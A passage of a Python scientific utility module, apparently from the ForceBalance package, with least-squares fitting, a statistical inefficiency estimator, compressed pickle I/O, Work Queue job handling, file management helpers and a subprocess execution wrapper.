@param[in] X (2-D array) An array of X-values (see above)
@param[in] Y (array) An array of Y-values (only used in getting the least squares coefficients)
@param[in] w (array) An array of weights, hopefully normalized to one.
@param[out] Beta The least-squares coefficients
@param[out] Hat The hat matrix that takes linear combinations of data y-values to give fitted y-values (weights)
@param[out] yfit The fitted y-values
@param[out] MPPI The Moore-Penrose pseudoinverse (multiply by Y to get least-squares coefficients, multiply by dY/dk to get derivatives of least-squares coefficients)
"""
# X is a 'tall' matrix.
X = np.array(x)
if len(X.shape) == 1:
X = X[:,np.newaxis]
Y = col(y)
n_x = X.shape[0]
n_fit = X.shape[1]
if n_fit > n_x:
logger.warning("Argh? It seems like this problem is underdetermined!\n")
# Build the weight matrix.
if w is not None:
if len(w) != n_x:
warn_press_key("The weight array length (%i) must be the same as the number of 'X' data points (%i)!" % len(w), n_x)
w /= np.mean(w)
WH = np.diag(w**0.5)
else:
WH = np.eye(n_x)
# Make the Moore-Penrose Pseudoinverse.
# if n_fit == n_x:
# MPPI = np.linalg.inv(WH*X)
# else:
# This resembles the formula (X'WX)^-1 X' W^1/2
MPPI = np.linalg.pinv(np.dot(WH, X))
Beta = multi_dot([MPPI, WH, Y])
Hat = multi_dot([WH, X, MPPI])
yfit = flat(np.dot(Hat, Y))
# Return three things: the least-squares coefficients, the hat matrix (turns y into yfit), and yfit
# We could get these all from MPPI, but I might get confused later on, so might as well do it here :P
return np.array(Beta).flatten(), np.array(Hat), np.array(yfit).flatten(), np.array(MPPI)
#===========================================#
#| John's statisticalInefficiency function |#
#===========================================#
def statisticalInefficiency(A_n, B_n=None, fast=False, mintime=3, warn=True):
"""
Compute the (cross) statistical inefficiency of (two) timeseries.
Notes
The same timeseries can be used for both A_n and B_n to get the autocorrelation statistical inefficiency.
The fast method described in Ref [1] is used to compute g.
References
[1] J. D. Chodera, W. C. Swope, J. W. Pitera, C. Seok, and K. A. Dill. Use of the weighted
histogram analysis method for the analysis of simulated and parallel tempering simulations.
JCTC 3(1):26-41, 2007.
Examples
Compute statistical inefficiency of timeseries data with known correlation time.
>>> import timeseries
>>> A_n = timeseries.generateCorrelatedTimeseries(N=100000, tau=5.0)
>>> g = statisticalInefficiency(A_n, fast=True)
@param[in] A_n (required, numpy array) - A_n[n] is nth value of
timeseries A. Length is deduced from vector.
@param[in] B_n (optional, numpy array) - B_n[n] is nth value of
timeseries B. Length is deduced from vector. If supplied, the
cross-correlation of timeseries A and B will be estimated instead of
the autocorrelation of timeseries A.
@param[in] fast (optional, boolean) - if True, will use faster (but
less accurate) method to estimate correlation time, described in
Ref. [1] (default: False)
@param[in] mintime (optional, int) - minimum amount of correlation
function to compute (default: 3) The algorithm terminates after
computing the correlation time out to mintime when the correlation
function furst goes negative. Note that this time may need to be
increased if there is a strong initial negative peak in the
correlation function.
@return g The estimated statistical inefficiency (equal to 1 + 2
tau, where tau is the correlation time). We enforce g >= 1.0.
"""
# Create numpy copies of input arguments.
A_n = np.array(A_n)
if B_n is not None:
B_n = np.array(B_n)
else:
B_n = np.array(A_n)
# Get the length of the timeseries.
N = A_n.shape[0]
# Be sure A_n and B_n have the same dimensions.
if A_n.shape != B_n.shape:
logger.error('A_n and B_n must have same dimensions.\n')
raise ParameterError
# Initialize statistical inefficiency estimate with uncorrelated value.
g = 1.0
# Compute mean of each timeseries.
mu_A = A_n.mean()
mu_B = B_n.mean()
# Make temporary copies of fluctuation from mean.
dA_n = A_n.astype(np.float64) - mu_A
dB_n = B_n.astype(np.float64) - mu_B
# Compute estimator of covariance of (A,B) using estimator that will ensure C(0) = 1.
sigma2_AB = (dA_n * dB_n).mean() # standard estimator to ensure C(0) = 1
# Trap the case where this covariance is zero, and we cannot proceed.
if sigma2_AB == 0:
if warn:
logger.warning('Sample covariance sigma_AB^2 = 0 -- cannot compute statistical inefficiency\n')
return 1.0
# Accumulate the integrated correlation time by computing the normalized correlation time at
# increasing values of t. Stop accumulating if the correlation function goes negative, since
# this is unlikely to occur unless the correlation function has decayed to the point where it
# is dominated by noise and indistinguishable from zero.
t = 1
increment = 1
while t < N-1:
# compute normalized fluctuation correlation function at time t
C = sum( dA_n[0:(N-t)]*dB_n[t:N] + dB_n[0:(N-t)]*dA_n[t:N] ) / (2.0 * float(N-t) * sigma2_AB)
# Terminate if the correlation function has crossed zero and we've computed the correlation
# function at least out to 'mintime'.
if (C <= 0.0) and (t > mintime):
break
# Accumulate contribution to the statistical inefficiency.
g += 2.0 * C * (1.0 - float(t)/float(N)) * float(increment)
# Increment t and the amount by which we increment t.
t += increment
# Increase the interval if "fast mode" is on.
if fast: increment += 1
# g must be at least unity
if g < 1.0: g = 1.0
# Return the computed statistical inefficiency.
return g
def mean_stderr(ts):
"""Return mean and standard deviation of a time series ts."""
return np.mean(ts), \
np.std(ts)*np.sqrt(statisticalInefficiency(ts, warn=False)/len(ts))
# Slices a 2D array of data by column. The new array is fed into the statisticalInefficiency function.
def multiD_statisticalInefficiency(A_n, B_n=None, fast=False, mintime=3, warn=True):
n_row = A_n.shape[0]
n_col = A_n.shape[-1]
multiD_sI = np.zeros((n_row, n_col))
for col in range(n_col):
if B_n is None:
multiD_sI[:,col] = statisticalInefficiency(A_n[:,col], B_n, fast, mintime, warn)
else:
multiD_sI[:,col] = statisticalInefficiency(A_n[:,col], B_n[:,col], fast, mintime, warn)
return multiD_sI
#========================================#
#| Loading compressed pickles |#
#========================================#
def lp_dump(obj, fnm, protocol=0):
""" Write an object to a zipped pickle file specified by the path. """
# Safeguard against overwriting files? Nah.
# if os.path.exists(fnm):
# logger.error("lp_dump cannot write to an existing path")
# raise IOError
if os.path.islink(fnm):
logger.warning("Trying to write to a symbolic link %s, removing it first\n" % fnm)
os.unlink(fnm)
if HaveGZ:
f = gzip.GzipFile(fnm, 'wb')
elif HaveBZ2:
f = bz2.BZ2File(fnm, 'wb')
else:
f = open(fnm, 'wb')
Pickler(f, protocol).dump(obj)
f.close()
def lp_load(fnm):
""" Read an object from a bzipped file specified by the path. """
if not os.path.exists(fnm):
logger.error("lp_load cannot read from a path that doesn't exist (%s)" % fnm)
raise IOError
def load_uncompress():
logger.warning("Compressed file loader failed, attempting to read as uncompressed file\n")
f = open(fnm, 'rb')
try:
answer = Unpickler(f).load()
except UnicodeDecodeError:
answer = Unpickler(f, encoding='latin1').load()
f.close()
return answer
def load_bz2():
f = bz2.BZ2File(fnm, 'rb')
try:
answer = Unpickler(f).load()
except UnicodeDecodeError:
answer = Unpickler(f, encoding='latin1').load()
f.close()
return answer
def load_gz():
f = gzip.GzipFile(fnm, 'rb')
try:
answer = Unpickler(f).load()
except UnicodeDecodeError:
answer = Unpickler(f, encoding='latin1').load()
f.close()
return answer
if HaveGZ:
try:
answer = load_gz()
except:
if HaveBZ2:
try:
answer = load_bz2()
except:
answer = load_uncompress()
else:
answer = load_uncompress()
elif HaveBZ2:
try:
answer = load_bz2()
except:
answer = load_uncompress()
else:
answer = load_uncompress()
return answer
#==============================#
#| Work Queue stuff |#
#==============================#
try:
import work_queue
except:
pass
#logger.warning("Work Queue library import fail (You can't queue up jobs using Work Queue)\n")
# Global variable corresponding to the Work Queue object
WORK_QUEUE = None
# Global variable containing a mapping from target names to Work Queue task IDs
WQIDS = defaultdict(list)
def getWorkQueue():
global WORK_QUEUE
return WORK_QUEUE
def getWQIds():
global WQIDS
return WQIDS
def createWorkQueue(wq_port, debug=True, name=package):
global WORK_QUEUE
if debug:
work_queue.set_debug_flag('all')
WORK_QUEUE = work_queue.WorkQueue(port=wq_port)
WORK_QUEUE.specify_name(name)
# QYD: prefer the worker that is fastest in previous tasks
# another choice is first-come-first serve: WORK_QUEUE_SCHEDULE_FCFS
WORK_QUEUE.specify_algorithm(work_queue.WORK_QUEUE_SCHEDULE_TIME)
# QYD: We don't want to specify the following extremely long keepalive times
# because they will prevent checking "dead" workers, causing the program to wait forever
#WORK_QUEUE.specify_keepalive_timeout(8640000)
#WORK_QUEUE.specify_keepalive_interval(8640000)
def destroyWorkQueue():
# Convenience function to destroy the Work Queue objects.
global WORK_QUEUE, WQIDS
WORK_QUEUE = None
WQIDS = defaultdict(list)
def queue_up(wq, command, input_files, output_files, tag=None, tgt=None, verbose=True, print_time=60):
"""
Submit a job to the Work Queue.
@param[in] wq (Work Queue Object)
@param[in] command (string) The command to run on the remote worker.
@param[in] input_files (list of files) A list of locations of the input files.
@param[in] output_files (list of files) A list of locations of the output files.
"""
global WQIDS
task = work_queue.Task(command)
cwd = os.getcwd()
for f in input_files:
lf = os.path.join(cwd,f)
task.specify_input_file(lf,f,cache=False)
for f in output_files:
lf = os.path.join(cwd,f)
task.specify_output_file(lf,f,cache=False)
if tag is None: tag = command
task.specify_tag(tag)
task.print_time = print_time
taskid = wq.submit(task)
if verbose:
logger.info("Submitting command '%s' to the Work Queue, %staskid %i\n" % (command, "tag %s, " % tag if tag != command else "", taskid))
if tgt is not None:
WQIDS[tgt.name].append(taskid)
else:
WQIDS["None"].append(taskid)
def queue_up_src_dest(wq, command, input_files, output_files, tag=None, tgt=None, verbose=True, print_time=60):
"""
Submit a job to the Work Queue. This function is a bit fancier in that we can explicitly
specify where the input files come from, and where the output files go to.
@param[in] wq (Work Queue Object)
@param[in] command (string) The command to run on the remote worker.
@param[in] input_files (list of 2-tuples) A list of local and
remote locations of the input files.
@param[in] output_files (list of 2-tuples) A list of local and
remote locations of the output files.
"""
global WQIDS
task = work_queue.Task(command)
for f in input_files:
# print f[0], f[1]
task.specify_input_file(f[0],f[1],cache=False)
for f in output_files:
# print f[0], f[1]
task.specify_output_file(f[0],f[1],cache=False)
if tag is None: tag = command
task.specify_tag(tag)
task.print_time = print_time
taskid = wq.submit(task)
if verbose:
logger.info("Submitting command '%s' to the Work Queue, taskid %i\n" % (command, taskid))
if tgt is not None:
WQIDS[tgt.name].append(taskid)
else:
WQIDS["None"].append(taskid)
def wq_wait1(wq, wait_time=10, wait_intvl=1, print_time=60, verbose=False):
""" This function waits ten seconds to see if a task in the Work Queue has finished. """
global WQIDS
if verbose: logger.info('---\n')
if wait_intvl >= wait_time:
wait_time = wait_intvl
numwaits = 1
else:
numwaits = int(wait_time/wait_intvl)
for sec in range(numwaits):
task = wq.wait(wait_intvl)
if task:
exectime = task.cmd_execution_time/1000000
if verbose:
logger.info('A job has finished!\n')
logger.info('Job name = ' + task.tag + 'command = ' + task.command + '\n')
logger.info("status = " + task.status + '\n')
logger.info("return_status = " + task.return_status)
logger.info("result = " + task.result)
logger.info("host = " + task.hostname + '\n')
logger.info("execution time = " + exectime)
logger.info("total_bytes_transferred = " + task.total_bytes_transferred + '\n')
if task.result != 0:
oldid = task.id
oldhost = task.hostname
tgtname = "None"
for tnm in WQIDS:
if task.id in WQIDS[tnm]:
tgtname = tnm
WQIDS[tnm].remove(task.id)
taskid = wq.submit(task)
logger.warning("Task '%s' (task %i) failed on host %s (%i seconds), resubmitted: taskid %i\n" % (task.tag, oldid, oldhost, exectime, taskid))
WQIDS[tgtname].append(taskid)
else:
if hasattr(task, 'print_time'):
print_time = task.print_time
if exectime > print_time: # Assume that we're only interested in printing jobs that last longer than a minute.
logger.info("Task '%s' (task %i) finished successfully on host %s (%i seconds)\n" % (task.tag, task.id, task.hostname, exectime))
for tnm in WQIDS:
if task.id in WQIDS[tnm]:
WQIDS[tnm].remove(task.id)
del task
# LPW 2018-09-10 Updated to use stats fields from CCTools 6.2.10
# Please upgrade CCTools version if errors are encountered during runtime.
if verbose:
logger.info("Workers: %i init, %i idle, %i busy, %i total joined, %i total removed\n" \
% (wq.stats.workers_init, wq.stats.workers_idle, wq.stats.workers_busy, wq.stats.workers_joined, wq.stats.workers_removed))
logger.info("Tasks: %i running, %i waiting, %i dispatched, %i submitted, %i total complete\n" \
% (wq.stats.tasks_running, wq.stats.tasks_waiting, wq.stats.tasks_dispatched, wq.stats.tasks_submitted, wq.stats.tasks_done))
logger.info("Data: %i / %i kb sent/received\n" % (int(wq.stats.bytes_sent/1024), int(wq.stats.bytes_received/1024)))
else:
logger.info("\r%s : %i/%i workers busy; %i/%i jobs complete \r" %\
(time.ctime(), wq.stats.workers_busy, wq.stats.workers_connected, wq.stats.tasks_done, wq.stats.tasks_submitted))
if time.time() - wq_wait1.t0 > 900:
wq_wait1.t0 = time.time()
logger.info('\n')
wq_wait1.t0 = time.time()
def wq_wait(wq, wait_time=10, wait_intvl=10, print_time=60, verbose=False):
""" This function waits until the work queue is completely empty. """
while not wq.empty():
wq_wait1(wq, wait_time=wait_time, wait_intvl=wait_intvl, print_time=print_time, verbose=verbose)
#=====================================#
#| File and process management stuff |#
#=====================================#
def click():
""" Stopwatch function for timing. """
ans = time.time() - click.t0
click.t0 = time.time()
return ans
click.t0 = time.time()
def splitall(path):
allparts = []
while 1:
parts = os.path.split(path)
if parts[0] == path: # sentinel for absolute paths
allparts.insert(0, parts[0])
break
elif parts[1] == path: # sentinel for relative paths
allparts.insert(0, parts[1])
break
else:
path = parts[0]
allparts.insert(0, parts[1])
return allparts
# Back up a file.
def bak(path, dest=None, cwd=None, start=1):
oldf = path
newf = None
if cwd != None:
if not os.path.exists(cwd):
raise RuntimeError("%s is not an existing folder" % cwd)
old_d = os.getcwd()
os.chdir(cwd)
if os.path.exists(path):
dnm, fnm = os.path.split(path)
if dnm == '' : dnm = '.'
base, ext = os.path.splitext(fnm)
if dest is None:
dest = dnm
if not os.path.isdir(dest): os.makedirs(dest)
i = start
while True:
fnm = "%s_%i%s" % (base,i,ext)
newf = os.path.join(dest, fnm)
if not os.path.exists(newf): break
i += 1
logger.info("Backing up %s -> %s\n" % (oldf, newf))
shutil.move(oldf,newf)
if cwd != None:
os.chdir(old_d)
return newf
# Purpose: Given a file name and/or an extension, do one of the following:
# 1) If provided a file name, check the file, crash if not exist and err==True. Return the file name.
# 2) If list is empty but extension is provided, check if one file exists that matches
# the extension. If so, return the file name.
# 3) If list is still empty and err==True, then crash with an error.
def onefile(fnm=None, ext=None, err=False):
if fnm is None and ext is None:
if err:
logger.error("Must provide either filename or extension to onefile()")
raise RuntimeError
else:
return None
if fnm is not None:
if os.path.exists(fnm):
if os.path.dirname(os.path.abspath(fnm)) != os.getcwd():
fsrc = os.path.abspath(fnm)
fdest = os.path.join(os.getcwd(), os.path.basename(fnm))
#-----
# If the file path doesn't correspond to the current directory, copy the file over
# If the file exists in the current directory already and it's different, then crash.
#-----
if os.path.exists(fdest):
if not filecmp.cmp(fsrc, fdest):
logger.error("onefile() will not overwrite %s with %s\n" % (os.path.join(os.getcwd(), os.path.basename(fnm)),os.path.abspath(fnm)))
raise RuntimeError
else:
logger.info("\x1b[93monefile() says the files %s and %s are identical\x1b[0m\n" % (os.path.abspath(fnm), os.getcwd()))
else:
logger.info("\x1b[93monefile() will copy %s to %s\x1b[0m\n" % (os.path.abspath(fnm), os.getcwd()))
shutil.copy2(fsrc, fdest)
return os.path.basename(fnm)
elif err==True or ext is None:
logger.error("File specified by %s does not exist!" % fnm)
raise RuntimeError
elif ext is not None:
warn_once("File specified by %s does not exist - will try to autodetect .%s extension" % (fnm, ext))
answer = None
cwd = os.getcwd()
ls = [i for i in os.listdir(cwd) if i.endswith('.%s' % ext)]
if len(ls) != 1:
if err:
logger.error("Cannot find a unique file with extension .%s in %s (%i found; %s)" % (ext, cwd, len(ls), ' '.join(ls)))
raise RuntimeError
else:
warn_once("Cannot find a unique file with extension .%s in %s (%i found; %s)" %
(ext, cwd, len(ls), ' '.join(ls)), warnhash = "Found %i .%s files" % (len(ls), ext))
else:
answer = os.path.basename(ls[0])
warn_once("Autodetected %s in %s" % (answer, cwd), warnhash = "Autodetected %s" % answer)
return answer
# Purpose: Given a file name / file list and/or an extension, do one of the following:
# 1) If provided a file list, check each file in the list
# and crash if any file does not exist. Return the list.
# 2) If provided a file name, check the file and crash if the file
# does not exist. Return a length-one list with the file name.
# 3) If list is empty but extension is provided, check for files that
# match the extension. If so, append them to the list.
# 4) If list is still empty and err==True, then crash with an error.
def listfiles(fnms=None, ext=None, err=False, dnm=None):
answer = []
cwd = os.path.abspath(os.getcwd())
if dnm is not None:
os.chdir(dnm)
if isinstance(fnms, list):
for i in fnms:
if not os.path.exists(i):
logger.error('Specified %s but it does not exist' % i)
raise RuntimeError
answer.append(i)
elif isinstance(fnms, six.string_types):
if not os.path.exists(fnms):
logger.error('Specified %s but it does not exist' % fnms)
raise RuntimeError
answer = [fnms]
elif fnms is not None:
logger.info(str(fnms))
logger.error('First argument to listfiles must be a list, a string, or None')
raise RuntimeError
if answer == [] and ext is not None:
answer = [os.path.basename(i) for i in os.listdir(os.getcwd()) if i.endswith('.%s' % ext)]
if answer == [] and err:
logger.error('listfiles function failed to come up with a file! (fnms = %s ext = %s)' % (str(fnms), str(ext)))
raise RuntimeError
for ifnm, fnm in enumerate(answer):
if os.path.dirname(os.path.abspath(fnm)) != os.getcwd():
fsrc = os.path.abspath(fnm)
fdest = os.path.join(os.getcwd(), os.path.basename(fnm))
#-----
# If the file path doesn't correspond to the current directory, copy the file over
# If the file exists in the current directory already and it's different, then crash.
#-----
if os.path.exists(fdest):
if not filecmp.cmp(fsrc, fdest):
logger.error("onefile() will not overwrite %s with %s\n" % (os.path.join(os.getcwd(), os.path.basename(fnm)),os.path.abspath(fnm)))
raise RuntimeError
else:
logger.info("\x1b[93monefile() says the files %s and %s are identical\x1b[0m\n" % (os.path.abspath(fnm), os.getcwd()))
answer[ifnm] = os.path.basename(fnm)
else:
logger.info("\x1b[93monefile() will copy %s to %s\x1b[0m\n" % (os.path.abspath(fnm), os.getcwd()))
shutil.copy2(fsrc, fdest)
answer[ifnm] = os.path.basename(fnm)
os.chdir(cwd)
return answer
def extract_tar(tarfnm, fnms, force=False):
"""
Extract a list of files from .tar archive with any compression.
The file is extracted to the base folder of the archive.
Parameters
----------
tarfnm :
Name of the archive file.
fnms : str or list
File names to be extracted.
force : bool, optional
If true, then force extraction of file even if they already exist on disk.
"""
# Get path of tar file.
fdir = os.path.abspath(os.path.dirname(tarfnm))
# If all files exist, then return - no need to extract.
if (not force) and all([os.path.exists(os.path.join(fdir, f)) for f in fnms]): return
# If the tar file doesn't exist or isn't valid, do nothing.
if not os.path.exists(tarfnm): return
if not tarfile.is_tarfile(tarfnm): return
# Check type of fnms argument.
if isinstance(fnms, six.string_types): fnms = [fnms]
# Load the tar file.
arch = tarfile.open(tarfnm, 'r')
# Extract only the files we have (to avoid an exception).
all_members = arch.getmembers()
all_names = [f.name for f in all_members]
members = [f for f in all_members if f.name in fnms]
# Extract files to the destination.
arch.extractall(fdir, members=members)
def GoInto(Dir):
if os.path.exists(Dir):
if os.path.isdir(Dir): pass
else:
logger.error("Tried to create directory %s, it exists but isn't a directory\n" % newdir)
raise RuntimeError
else:
os.makedirs(Dir)
os.chdir(Dir)
def allsplit(Dir):
# Split a directory into all directories involved.
s = os.path.split(os.path.normpath(Dir))
if s[1] == '' or s[1] == '.' : return []
return allsplit(s[0]) + [s[1]]
def Leave(Dir):
if os.path.split(os.getcwd())[1] != Dir:
logger.error("Trying to leave directory %s, but we're actually in directory %s (check your code)\n" % (Dir,os.path.split(os.getcwd())[1]))
raise RuntimeError
for i in range(len(allsplit(Dir))):
os.chdir('..')
# Dictionary containing specific error messages for specific missing files or file patterns
specific_lst = [(['mdrun','grompp','trjconv','g_energy','g_traj'], "Make sure to install GROMACS and add it to your path (or set the gmxpath option)"),
(['force.mdin', 'stage.leap'], "This file is needed for setting up AMBER force matching targets"),
(['conf.pdb', 'mono.pdb'], "This file is needed for setting up OpenMM condensed phase property targets"),
(['liquid.xyz', 'liquid.key', 'mono.xyz', 'mono.key'], "This file is needed for setting up OpenMM condensed phase property targets"),
(['dynamic', 'analyze', 'minimize', 'testgrad', 'vibrate', 'optimize', 'polarize', 'superpose'], "Make sure to install TINKER and add it to your path (or set the tinkerpath option)"),
(['runcuda.sh', 'npt.py', 'npt_tinker.py'], "This file belongs in the ForceBalance source directory, not sure why it is missing"),
(['input.xyz'], "This file is needed for TINKER molecular property targets"),
(['.*key$', '.*xyz$'], "I am guessing this file is probably needed by TINKER"),
(['.*gro$', '.*top$', '.*itp$', '.*mdp$', '.*ndx$'], "I am guessing this file is probably needed by GROMACS")
]
# Build a dictionary mapping all of the keys in the above lists to their error messages
specific_dct = dict(list(itertools.chain(*[[(j,i[1]) for j in i[0]] for i in specific_lst])))
def MissingFileInspection(fnm):
fnm = os.path.split(fnm)[1]
answer = ""
for key in specific_dct:
if answer == "":
answer += "\n"
if re.match(key, fnm):
answer += "%s\n" % specific_dct[key]
return answer
def wopen(dest, binary=False):
""" If trying to write to a symbolic link, remove it first. """
if os.path.islink(dest):
logger.warning("Trying to write to a symbolic link %s, removing it first\n" % dest)
os.unlink(dest)
if binary:
return open(dest,'wb')
else:
return open(dest,'w')
def LinkFile(src, dest, nosrcok = False):
if os.path.abspath(src) == os.path.abspath(dest): return
if os.path.exists(src):
# Remove broken link
if os.path.islink(dest) and not os.path.exists(dest):
os.remove(dest)
os.symlink(src, dest)
elif os.path.exists(dest):
if os.path.islink(dest): pass
else:
logger.error("Tried to create symbolic link %s to %s, destination exists but isn't a symbolic link\n" % (src, dest))
raise RuntimeError
else:
os.symlink(src, dest)
else:
if not nosrcok:
logger.error("Tried to create symbolic link %s to %s, but source file doesn't exist%s\n" % (src,dest,MissingFileInspection(src)))
raise RuntimeError
def CopyFile(src, dest):
if os.path.exists(src):
if os.path.exists(dest):
if os.path.islink(dest):
logger.error("Tried to copy %s to %s, destination exists but it's a symbolic link\n" % (src, dest))
raise RuntimeError
else:
shutil.copy2(src, dest)
else:
logger.error("Tried to copy %s to %s, but source file doesn't exist%s\n" % (src,dest,MissingFileInspection(src)))
raise RuntimeError
def link_dir_contents(abssrcdir, absdestdir):
for fnm in os.listdir(abssrcdir):
srcfnm = os.path.join(abssrcdir, fnm)
destfnm = os.path.join(absdestdir, fnm)
if os.path.islink(destfnm) and not os.path.exists(destfnm):
os.remove(destfnm)
if os.path.isfile(srcfnm) or (os.path.isdir(srcfnm) and fnm == 'IC'):
if not os.path.exists(destfnm):
#print "Linking %s to %s" % (srcfnm, destfnm)
os.symlink(srcfnm, destfnm)
def remove_if_exists(fnm):
""" Remove the file if it exists (doesn't return an error). """
if os.path.exists(fnm):
os.remove(fnm)
def which(fnm):
# Get the location of a file. Works only on UNIX-like file systems.
try:
return os.path.split(os.popen('which %s 2> /dev/null' % fnm).readlines()[0].strip())[0]
except:
return ''
def copy_tree_over(src, dest):
"""
Copy a source directory tree to a destination directory tree,
overwriting files as necessary. This does not require removing
the destination folder, which can reduce the number of times
shutil.rmtree needs to be called.
"""
# From https://stackoverflow.com/questions/9160227/dir-util-copy-tree-fails-after-shutil-rmtree/28055993 :
# If you copy folder, then remove it, then copy again it will fail, because it caches all the created dirs.
# To workaround you can clear _path_created before copy:
distutils.dir_util._path_created = {}
distutils.dir_util.copy_tree(src, dest)
# Thanks to cesarkawakami on #python (IRC freenode) for this code.
class LineChunker(object):
def __init__(self, callback):
self.callback = callback
self.buf = ""
def push(self, data):
# Added by LPW during Py3 compatibility; ran into some trouble decoding strings such as
# "a" with umlaut on top. I guess we can ignore these for now. For some reason,
# Py2 never required decoding of data, I can simply add it to the wtring.
# self.buf += data # Old Py2 code...
self.buf += data.decode('utf-8')#errors='ignore')
self.nomnom()
def close(self):
if self.buf:
self.callback(self.buf + "\n")
def nomnom(self):
# Splits buffer by new line or carriage return, and passes
# the splitted results onto processing.
while "\n" in self.buf or "\r" in self.buf:
chunk, sep, self.buf = re.split(r"(\r|\n)", self.buf, maxsplit=1)
self.callback(chunk + sep)
def __enter__(self):
return self
def __exit__(self, *args, **kwargs):
self.close()
def _exec(command, print_to_screen = False, outfnm = None, logfnm = None, stdin = "", print_command = True, copy_stdout = True, copy_stderr = False, persist = False, expand_cr=False, print_error=True, rbytes=1, cwd=None, **kwargs):
"""Runs command line using subprocess, optionally returning stdout.
Options:
command (required) = Name of the command you want to execute
outfnm (optional) = Name of the output file name (overwritten if exists)
logfnm (optional) = Name of the log file name (appended if exists)
stdin (optional) = A string to be passed to stdin, as if it were typed (use newline character to mimic Enter key)
print_command = Whether to print the command.
copy_stdout = Copy the stdout stream; can set to False in strange situations
copy_stderr = Copy the stderr stream to the stdout stream; useful for GROMACS which prints out everything to stderr (argh.)
expand_cr = Whether to expand carriage returns into newlines (useful for GROMACS mdrun).
print_error = Whether to print error messages on a crash. Should be true most of the time.
persist = Continue execution even if the command gives a nonzero return code.
rbytes = Number of bytes to read from stdout and stderr streams at a time. GMX requires rbytes = 1 otherwise streams are interleaved. Higher values for speed.
"""
# Dictionary of options to be passed to the Popen object.
cmd_options={'shell':isinstance(command, six.string_types), 'stdin':PIPE, 'stdout':PIPE, 'stderr':PIPE, 'universal_newlines':expand_cr, 'cwd':cwd}
# If the current working directory is provided, the outputs will be written to there as well.
if cwd is not None:
if outfnm is not None:
outfnm = os.path.abspath(os.path.join(cwd, outfnm))
if logfnm is not None:
logfnm = os.path.abspath(os.path.join(cwd, logfnm))
# "write to file" : Function for writing some characters to the log and/or output files.
def wtf(out):
if logfnm is not None:
with open(logfnm,'ab+') as f:
f.write(out.encode('utf-8'))
f.flush()
if outfnm is not None:
with open(outfnm,'wb+' if wtf.first else 'ab+') as f:
f.write(out.encode('utf-8'))
f.flush()
wtf.first = False
wtf.first = True
# Preserve backwards compatibility; sometimes None gets passed to stdin.
if stdin is None: stdin = ""
if print_command:
logger.info("Executing process: \x1b[92m%-50s\x1b[0m%s%s%s%s\n" % (' '.join(command) if type(command) is list else command,
" In: %s" % cwd if cwd is not None else "",
" Output: %s" % outfnm if outfnm is not None else "",
" Append: %s" % logfnm if logfnm is not None else "",
(" Stdin: %s" % stdin.replace('\n','\\n')) if stdin else ""))
wtf("Executing process: %s%s\n" % (command, (" Stdin: %s" % stdin.replace('\n','\\n')) if stdin else ""))
cmd_options.update(kwargs)
p = subprocess.Popen(command, **cmd_options)
# Write the stdin stream to the process.
p.stdin.write(stdin.encode('ascii'))
p.stdin.close()
#===============================================================#
#| Read the output streams from the process. This is a bit |#
#| complicated because programs like GROMACS tend to print out |#
#| stdout as well as stderr streams, and also carriage returns |#
#| along with newline characters. |#
#===============================================================#
# stdout and stderr streams of the process.
streams = [p.stdout, p.stderr]
# Are we using Python 2?
p2 = sys.version_info.major == 2
# These are functions that take chunks of lines (read) as inputs.
def process_out(read):
if print_to_screen:
# LPW 2019-11-25: We should be writing a string, not a representation of bytes
if p2:
sys.stdout.write(str(read.encode('utf-8')))
else:
sys.stdout.write(read)
if copy_stdout:
process_out.stdout.append(read)
wtf(read)
process_out.stdout = []
def process_err(read):
if print_to_screen:
if p2:
sys.stderr.write(str(read.encode('utf-8')))
else:
sys.stderr.write(read)
process_err.stderr.append(read)
if copy_stderr:
process_out.stdout.append(read)
wtf(read)
process_err.stderr = []
# This reads the streams one byte at a time, and passes it to the LineChunker
# which splits it by either newline or carriage return.
# If the stream has ended, then it is removed from the list.
with LineChunker(process_out) as out_chunker, LineChunker(process_err) as err_chunker:
while True:
to_read, _, _ = select(streams, [], [])
for fh in to_read:
# We want to call fh.read below, but this can lead to a system hang when executing Tinker on mac.
# This hang can be avoided by running fh.read1 (with a "1" at the end), however python2.7
# doesn't implement ByteStream.read1. So, to enable python3 builds on mac to work, we pick the "best"
# fh.read function we can get
if hasattr(fh, 'read1'):
fhread = fh.read1
else:
fhread = fh.read
if fh is p.stdout:
read_nbytes = 0
read = ''.encode('utf-8')
while True:
if read_nbytes == 0:
read += fhread(rbytes)
read_nbytes += rbytes
else:
read += fhread(1)
read_nbytes += 1
if read_nbytes > 10+rbytes:
raise RuntimeError("Failed to decode stdout from external process.")
if not read:
streams.remove(p.stdout)
p.stdout.close()
break
else:
try:
out_chunker.push(read)
break
except UnicodeDecodeError:
pass
elif fh is p.stderr:
read_nbytes = 0
read = ''.encode('utf-8')
while True:
if read_nbytes == 0:
read += fhread(rbytes)
read_nbytes += rbytes
else:
read += fhread(1)
read_nbytes += 1
if read_nbytes > 10+rbytes:
raise RuntimeError("Failed to decode stderr from external process.")
if not read:
streams.remove(p.stderr)
p.stderr.close()
break
else:
try:
err_chunker.push(read)
break
except UnicodeDecodeError:
pass
else:
raise RuntimeError
if len(streams) == 0: break
p.wait()
process_out.stdout = ''.join(process_out.stdout)
process_err.stderr = ''.join(process_err.stderr)
_exec.returncode = p.returncode
if p.returncode != 0:
if process_err.stderr and print_error:
logger.warning("Received an error message:\n")
logger.warning("\n[====] \x1b[91mError Message\x1b[0m [====]\n")
logger.warning(process_err.stderr)
logger.warning("[====] \x1b[91mEnd o'Message\x1b[0m [====]\n")
if persist:
if print_error:
logger.info("%s gave a return code of %i (it may have crashed) -- carrying on\n" % (command, p.returncode))
else:
# This code (commented out) would not throw an exception, but instead exit with the returncode of the crashed program.
# sys.stderr.write("\x1b[1;94m%s\x1b[0m gave a return code of %i (\x1b[91mit may have crashed\x1b[0m)\n" % (command, p.returncode))
# sys.exit(p.returncode)
logger.error("\x1b[1;94m%s\x1b[0m gave a return code of %i (\x1b[91mit may have crashed\x1b[0m)\n\n" % (command, p.returncode))
raise RuntimeError
# Return the output in the form of a list of lines, so we can loop over it using "for line in output".
Out = process_out.stdout.split('\n')
if Out[-1] == '':
Out = Out[:-1]
return Out
_exec.returncode = None
def warn_press_key(warning, timeout=10):
logger.warning(warning + '\n')
if sys.stdin.isatty():
logger.warning("\x1b[1;91mPress Enter or wait %i seconds (I assume no responsibility for what happens after this!)\x1b[0m\n" % timeout)
try:
rlist, wlist, xlist = select([sys.stdin], [], [], timeout)
if rlist:
sys.stdin.readline()
except: pass
def warn_once(warning, warnhash = None):
""" Prints a warning but will only do so once in a given run. """
if warnhash is None:
warnhash = warning
